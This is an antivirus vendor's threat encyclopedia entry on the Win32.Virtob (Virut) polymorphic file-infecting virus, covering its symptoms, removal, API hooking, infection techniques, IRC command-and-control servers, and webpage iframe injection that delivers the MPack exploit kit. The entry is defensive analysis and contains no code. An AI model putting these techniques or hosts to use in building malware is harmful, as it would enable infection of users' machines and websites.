My Bitdefender
  • 0 Shopping Cart

SHARE
THIS ON

Facebook Twitter Google Plus

Win32.Virtob.{2,3,4}.Gen

MEDIUM
MEDIUM
7 - 10 KB
(Generic.Virtob.1, Win32.Virut, W32/Virut, Virus.Win32.Virut, Virus:Win32/Virut, W32.Virut, W32/Vetor)

Symptoms


  • Executable files' sizes increase with 7-10 KB, depending on version; unfortunately, there are versions that infect a single file more times.
  • DNS queries to some IRC servers, and continuous TCP connection attempts to them (on destination port 65520 or 80).

Removal instructions:


Please let BitDefender disinfect your files.

Please note that there are versions of Virtob that contain bugs, so it is possible that misinfected files can't be disinfected.

Analyzed By

Raul TOSA, BitDefender virus researcher

Technical Description:


This virus is a polymorphic, memory-resident file-infector, with backdoor behaviour.

The author spreads it by posting it as a crack for different applications or games, on several forums. He also uses a "pay-per-install" affiliate program, hosted at exerevenue.com, but the executable he pretends users have to run to earn cash is the virus itself.

Once executed, it injects itself into WINLOGON, creates a new thread in that process, and passes the execution control to the host file.

It also hooks the following functions in each running process (in NTDLL module):
  • NtCreateFile
  • NtOpenFile
  • NtCreateProcess
  • NtCreateProcessEx
so that every time an infected process calls one of these functions, the execution is passed to the virus, wich infects the accessed file, and then returns the control to the original function.

It infects EXE and SCR files, using different infection techniques:
  • Appending to the last section of the victim, and setting the Entry Point directly to the viral code.
  • Entry Point Obscuring (EPO) - it searches for an IAT call in the code section, and patches it with a call to it's polymorphic decryptor.
  • Overwriting some bytes at the Entry Point with it's decryptor.
  • Inserting into the slack space of the code section, if it there is enough space for it's polymorphic decryptor.
Later versions (the ones detected with Win32.Virtob.6.Gen) have a single infection method (the first one in the list).

The virus is able to avoid emulators and virtual machines.

To ensure there's only one instance of it running in the system, it creates an event with one of the following names:
  • VT_3
  • VT_4
  • VevT
  • Vx_4

It avoids infecting files that containg the following strings:
  • WINC
  • WCUN
  • WC32
  • PSTO

It tries to connect to some IRC server, and join a certain channel. The IRC server can be:
  • proxim.ircgalaxy.pl
  • proxima.ircgalaxy.pl
  • proxim.ntkrnlpa.info
  • ircd.zief.pl

Once it joins the channel, it waits for commands that instruct it to download several files from Internet, and then execute them.

One of these files is a second component of the virus (it is detected as Win32.Virtob.Dld.?). It downloads other files (other downloaders), and infects HTM, PHP and ASP files found on all fixed and removable drives, and also on network shares, by inserting an IFRAME right before the BODY tag.

The IFRAME contains MPack, an exploit kit that includes:
  • MS06-014
  • MS06-006
  • MS06-044
  • MS06-071
  • MS06-057
  • WinZip ActiveX overflow
  • QuickTime overflow
  • MS07-017
They are used to download and execute a remote executable file (the latest version of the virus).

By infecting ASP, HTM and PHP scripts on every infected machine, it is possible to infect scripts that serve webpages, so the potential of spreading is bigger (it is actually acting like a worm).

Some versions have a piece of a Friedrich Nietzsche's poem. Usually this is:

O noon of life! O time to celebrate!
O summer garden!
Relentlessly happy and expectant, standing: -
Watching all day and night, for friends I wait:
Where are you, friends? Come! It is time! It's late!


or:

The glacier's gray adorned itself for you
Today with roses;
The brook seeks you, and full of longing rises
The wind, the cloud, into the vaulting blue
To look for you from dizzy bird's-eye view.

 

It is possible that some versions are detected by BitDefender with names like:

  • Generic.Virtob.1.????????
  • DeepScan:Generic.Virtob.1.????????
  • Win32.Virtob.??

 

Note: there are a lot of versions that contain bugs, so not all the described behavior actually works as expected.